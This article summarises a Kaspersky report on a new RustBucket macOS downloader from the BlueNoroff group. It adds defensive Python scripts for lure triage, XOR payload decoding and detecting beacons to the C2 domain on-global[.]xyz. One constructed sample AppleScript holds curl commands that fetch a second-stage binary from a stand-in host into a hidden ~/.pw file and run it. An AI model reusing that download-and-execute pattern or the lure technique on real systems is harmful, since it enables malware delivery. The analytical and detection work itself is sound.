Researchers at Kaspersky Lab have identified a new variant of the malicious downloader used in the RustBucket campaign, which is attributed to the BlueNoroff APT group and shows that the group remains active. RustBucket targets macOS users, with a focus on financial institutions, companies connected to cryptocurrency, and private individuals active in the crypto space.
RustBucket's delivery has changed since its earlier iterations, which distributed the payload through applications posing as PDF viewers. The latest variant arrived inside a ZIP archive as what appears to be a PDF titled "Cryptocurrency assets and their risks to financial stability", complete with an innocuous-looking cover page; the file's creation date is October 21, 2023.
How the archive is distributed is not known. In earlier campaigns the group relied on email, so that is the most likely delivery channel here as well: the victim is persuaded to open what looks like a legitimate document and thereby runs the downloader.
What the archive actually contains is not a document but a macOS application, EdoneViewer, written in Swift. The executable is a universal binary that runs on both Intel and Apple Silicon machines, and at the time of discovery it carried a valid code signature. The signing certificate was revoked once the sample was identified. The practical lesson is that a valid signature is no evidence that an application is benign; it shows only that the signer held a certificate at the time, and revocation lags discovery.
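The two things a triage analyst would check first on such an archive are whether it carries an application bundle named like a document and whether that bundle's executable is a universal (fat) Mach-O. The following script is an added example, not code from the Kaspersky report or from the malware; it constructs its own sample archive in memory, and the ".pdf.app" double extension, the Info.plist contents and the fat-header padding are assumptions for the demonstration rather than details taken from the real sample.

```python
import io
import struct
import zipfile
from typing import Dict, List, Optional

# Mach-O magic numbers as the first four bytes appear on disk.
# Note: Java .class files share the CAFEBABE magic, so classify_macho() is a
# triage hint, not proof; the arch count after it is what a real fat header has.
FAT_MAGIC = b"\xca\xfe\xba\xbe"  # universal (fat) binary; header fields are big-endian
THIN_MAGICS = {
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit",
}
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".rtf")


def classify_macho(head: bytes) -> Optional[str]:
    """Classify a file from its leading bytes; None if it is not Mach-O."""
    if head[:4] == FAT_MAGIC and len(head) >= 8:
        nfat = struct.unpack(">I", head[4:8])[0]  # number of embedded architectures
        return "universal Mach-O (%d architectures)" % nfat
    return THIN_MAGICS.get(head[:4])


def find_app_lures(zip_bytes: bytes) -> List[Dict[str, object]]:
    """List .app bundles in a ZIP with the signals that mark a document-lookalike lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        bundles = sorted({n.split(".app/", 1)[0] + ".app" for n in names if ".app/" in n})
        for bundle in bundles:
            stem = bundle.rsplit("/", 1)[-1][:-4]  # bundle name without ".app"
            macos_dir = bundle + "/Contents/MacOS/"
            for name in names:
                if name.startswith(macos_dir) and not name.endswith("/"):
                    exe = name[len(macos_dir):]
                    with zf.open(name) as fh:
                        head = fh.read(8)
                    findings.append({
                        "bundle": bundle,
                        "executable": exe,
                        "binary": classify_macho(head),
                        # Finder hides ".app", so "Title.pdf.app" is shown as "Title.pdf".
                        "doc_extension": stem.lower().endswith(DOC_EXTS),
                        # A bundle named like a document that carries a program with an
                        # unrelated name (EdoneViewer) is the pattern the article describes.
                        "name_mismatch": exe.lower() not in stem.lower(),
                    })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive (not the real malware) mimicking the lure layout."""
    bundle = "Cryptocurrency assets and their risks to financial stability.pdf.app"
    fat_header = FAT_MAGIC + struct.pack(">I", 2) + b"\x00" * 40  # two-arch fat header, padded
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(bundle + "/Contents/Info.plist", "<plist><dict/></plist>")
        zf.writestr(bundle + "/Contents/MacOS/EdoneViewer", fat_header)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_app_lures(build_sample_zip()):
        print(finding)
```

Signature validity is deliberately not checked here: that needs `codesign --verify` on a Mac and, as the article notes, the answer changes once the certificate is revoked. The structural signals above do not.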
The payload embedded in the application is XOR-encoded. A function named CalculateExtameGCD decodes it into an AppleScript, which, when run, executes a sequence of shell commands: it downloads a decoy PDF to show the victim while the infection proceeds, then sends a request to the attackers' server and writes the response to a hidden file named .pw.
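Recovering such a payload during analysis usually comes down to two steps: undo the XOR with a key that is either read out of the decoder or recovered from known plaintext, then pull the shell commands out of the resulting AppleScript. The block below is an added example, not the malware's CalculateExtameGCD routine or anything from the Kaspersky report. It generalises the single case in the text to any repeating XOR key by using `do shell script` as a crib; the sample script, its URLs, the `~/.pw` path and the three-byte key are all constructed for the demonstration.

```python
import re
from typing import List, Optional

# Strings whose presence marks a decoded blob as the kind of AppleScript the
# article describes: a script that shells out to fetch files and run them.
SCRIPT_MARKERS = (b"do shell script", b"curl ", b"osascript", b"tell application")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_script(blob: bytes) -> bool:
    """True if the blob is printable text containing at least one script marker."""
    printable = all(32 <= b < 127 or b in (9, 10, 13) for b in blob)
    return printable and any(m in blob for m in SCRIPT_MARKERS)


def recover_repeating_key(blob: bytes, crib: bytes, max_key_len: int = 16) -> Optional[bytes]:
    """Known-plaintext recovery of a repeating XOR key.

    Slide the crib over the blob for each candidate key length; the crib must
    cover every key position at least twice so each derived key byte is
    corroborated. The first key whose full decode looks like a script wins.
    """
    for key_len in range(1, max_key_len + 1):
        if len(crib) < 2 * key_len:
            break
        for off in range(len(blob) - len(crib) + 1):
            key: List[Optional[int]] = [None] * key_len
            consistent = True
            for i, c in enumerate(crib):
                slot = (off + i) % key_len
                k = blob[off + i] ^ c
                if key[slot] is None:
                    key[slot] = k
                elif key[slot] != k:
                    consistent = False
                    break
            if not consistent:
                continue
            candidate = bytes(key)  # every slot is filled because len(crib) >= 2 * key_len
            if looks_like_script(xor_bytes(blob, candidate)):
                return candidate
    return None


def extract_shell_commands(script: bytes) -> List[str]:
    """Pull the argument of every `do shell script "..."` call out of an AppleScript."""
    return [m.decode() for m in re.findall(rb'do shell script "((?:[^"\\]|\\.)*)"', script)]


# Constructed sample (not the real payload): an AppleScript that downloads a decoy
# PDF, then fetches a second-stage binary into a hidden file ".pw" and runs it.
# The URLs and the ~/.pw path are placeholders, not values from the report.
SAMPLE_SCRIPT = (
    b'do shell script "curl -o /tmp/decoy.pdf https://lure.example/decoy.pdf; open /tmp/decoy.pdf"\n'
    b'do shell script "curl -s https://lure.example/stage -o ~/.pw && chmod +x ~/.pw && ~/.pw &"\n'
)
SAMPLE_KEY = b"\x5a\x13\xc4"  # arbitrary three-byte key for the demonstration


if __name__ == "__main__":
    encoded = xor_bytes(SAMPLE_SCRIPT, SAMPLE_KEY)  # what an analyst would carve from the binary
    key = recover_repeating_key(encoded, b"do shell script")
    print("recovered key:", key.hex() if key else None)
    for cmd in extract_shell_commands(xor_bytes(encoded, key)):
        print("shell:", cmd)
```

The consistency check matters: a crib that is only as long as the key can force any blob to "decode" to the crib at one offset, so each key byte has to be confirmed by at least two crib positions before the candidate is tried.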
The .pw file is itself a universal-format executable (Intel and Apple Silicon) that Kaspersky had already identified as a Trojan in August 2023. It collects system information, including the computer name, operating-system details, time zone and the list of running processes, and sends it to the command-and-control (C2) server at on-global[.]xyz.
The Trojan runs in a loop, reporting to the C2 server every minute and waiting for commands that would deliver the next stage of the attack. During analysis the researchers received no commands from the server, so what that stage does remains unknown. The one-minute cadence is itself a useful detection signal: a process that contacts the same external host at a fixed interval regardless of user activity deserves a closer look, even when the destination is not yet on any blocklist.
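A detection that uses both signals in the report, the known C2 domain and the fixed one-minute cadence, can be run over proxy or DNS logs. The script below is an added example written for this article, not a rule from Kaspersky or any vendor. The log lines are constructed, the hostnames other than on-global[.]xyz are placeholders, and the thresholds (at least five connections, median interval within 10% of 60 seconds, jitter under 5%) are choices for the demonstration.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# C2 domain named in the Kaspersky report (given there defanged as on-global[.]xyz).
IOC_DOMAINS = {"on-global.xyz"}

# Constructed sample log (not real telemetry): "<ISO timestamp> <source host> <destination>".
# mac-01 beacons to the known C2, mac-03 beacons at the same cadence to an unknown
# domain, mac-02 makes a few irregular connections.
SAMPLE_LOG = """\
2023-12-01T10:00:00 mac-01 on-global.xyz
2023-12-01T10:00:07 mac-01 apple.com
2023-12-01T10:00:10 mac-03 updates.unknown.example
2023-12-01T10:01:00 mac-01 on-global.xyz
2023-12-01T10:01:10 mac-03 updates.unknown.example
2023-12-01T10:01:59 mac-01 on-global.xyz
2023-12-01T10:02:11 mac-03 updates.unknown.example
2023-12-01T10:02:30 mac-02 cdn.example
2023-12-01T10:03:01 mac-01 on-global.xyz
2023-12-01T10:03:10 mac-03 updates.unknown.example
2023-12-01T10:04:00 mac-01 on-global.xyz
2023-12-01T10:04:10 mac-03 updates.unknown.example
2023-12-01T10:04:45 mac-02 cdn.example
2023-12-01T10:05:00 mac-01 on-global.xyz
2023-12-01T10:09:12 mac-02 cdn.example
"""


def parse_log(text: str) -> Dict[Tuple[str, str], List[datetime]]:
    """Group connection timestamps by (source host, destination)."""
    events: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, dst = line.split()
        events[(host, dst)].append(datetime.fromisoformat(ts))
    return events


def beacon_score(times: List[datetime], min_events: int = 5) -> Optional[Tuple[float, float]]:
    """Median inter-connection interval and its relative jitter, or None if too few events."""
    if len(times) < min_events:
        return None
    ordered = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    median = statistics.median(gaps)
    # Median absolute deviation is robust to a single dropped or delayed beacon.
    mad = statistics.median(abs(g - median) for g in gaps)
    jitter = mad / median if median > 0 else float("inf")
    return median, jitter


def find_beacons(text: str, period: float = 60.0, tolerance: float = 0.1,
                 max_jitter: float = 0.05) -> List[Tuple[str, str, List[str]]]:
    """Flag (host, destination) pairs that match a known C2 or beacon at a fixed cadence."""
    alerts = []
    for (host, dst), times in parse_log(text).items():
        reasons = []
        if dst in IOC_DOMAINS:
            reasons.append("known RustBucket C2 domain")
        score = beacon_score(times)
        if score is not None:
            median, jitter = score
            if abs(median - period) <= period * tolerance and jitter <= max_jitter:
                reasons.append("fixed %.0fs cadence over %d connections (jitter %.3f)"
                               % (median, len(times), jitter))
        if reasons:
            alerts.append((host, dst, reasons))
    return alerts


if __name__ == "__main__":
    for host, dst, reasons in find_beacons(SAMPLE_LOG):
        print(host, "->", dst, ";", "; ".join(reasons))
```

The cadence rule will also fire on legitimate software that polls every minute, which is why the sample keeps the IOC match as a separate reason: a cadence-only hit is a lead to triage (which process owns the connection, is it a hidden file, is it signed), not a verdict.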
Although the silent C2 server kept the researchers from seeing RustBucket's full capabilities, the Trojan is now widely detected by antivirus products. For defenders the useful indicators are the ones described above: a ZIP archive that delivers an application bundle named like a document, a script that writes a hidden file named .pw, and connections to on-global[.]xyz at one-minute intervals. Beyond that, the usual advice applies: keep macOS and security software up to date, and treat unsolicited documents about crypto assets with suspicion, since this group's lures are written for exactly that audience.